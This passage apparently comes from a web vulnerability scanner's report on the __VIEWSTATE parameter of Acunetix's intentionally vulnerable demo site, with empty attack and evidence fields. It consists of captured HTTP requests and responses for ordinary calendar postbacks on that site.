href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:White" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8123&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAYxEXEdoIZGRkxf9LtWxhWTZ9C4tqgHbXZIyD71Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKd5szcDgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIwOsSZckvWPvpaYHyJgjSXuT30f
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:45 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAYxEXEdoIZGRkxf9LtWxhWTZ9C4tqgHbXZIyD71Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKd5szcDgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIwOsSZckvWPvpaYHyJgjSXuT30f" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:White" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8122&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA%2BeZNENoIZGRk6LMHX3qUNdDnClcTYGuClE%2FVdUo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLBzZTVCwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBaaIqa8aOuGGMkDxjCADekX4H5V
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:03 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA+eZNENoIZGRk6LMHX3qUNdDnClcTYGuClE/VdUo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLBzZTVCwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBaaIqa8aOuGGMkDxjCADekX4H5V" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> 